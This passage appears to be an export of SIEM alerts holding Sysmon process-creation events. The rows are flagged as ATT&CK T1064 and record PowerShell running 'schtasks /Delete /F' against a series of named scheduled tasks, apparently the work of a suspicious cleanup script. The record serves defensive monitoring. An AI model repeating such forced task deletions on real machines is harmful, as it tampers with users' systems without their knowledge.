{df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.326"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-00103dda2100}"",""processId"":""7896"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HomeGroupProvider /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.010",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.292 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-00109cd82100} +ProcessId: 7900 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: 
Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN GooglePingConfigs /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.297276400Z"",""eventRecordID"":""2825"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.292\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-00109cd82100}\r\nProcessId: 7900\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 
{df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.292"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-00109cd82100}"",""processId"":""7900"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN GooglePingConfigs /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.963",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:50:32.258 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-0010fdd62100} +ProcessId: 5692 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN RavTask /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.262375800Z"",""eventRecordID"":""2824"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.258\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-0010fdd62100}\r\nProcessId: 5692\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.258"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-0010fdd62100}"",""processId"":""5692"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN RavTask /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.947",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.225 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-001065d52100} +ProcessId: 4360 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Flash /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.230234600Z"",""eventRecordID"":""2823"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.225\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-001065d52100}\r\nProcessId: 4360\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.225"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-001065d52100}"",""processId"":""4360"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Flash /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.900",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.185 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-001090d22100} +ProcessId: 8056 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Netframework /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.189567800Z"",""eventRecordID"":""2822"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.185\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-001090d22100}\r\nProcessId: 8056\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:32.185"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-001090d22100}"",""processId"":""8056"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Netframework /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.885",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.083 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-0010f7cf2100} +ProcessId: 6192 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Miscfost /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.085653300Z"",""eventRecordID"":""2821"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.083\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-0010f7cf2100}\r\nProcessId: 6192\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 
6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.083"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-0010f7cf2100}"",""processId"":""6192"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Miscfost /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.869",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.045 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-0010f6cd2100} +ProcessId: 3668 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN skycmd /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.048720300Z"",""eventRecordID"":""2820"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.045\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-0010f6cd2100}\r\nProcessId: 3668\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.045"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-0010f6cd2100}"",""processId"":""3668"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 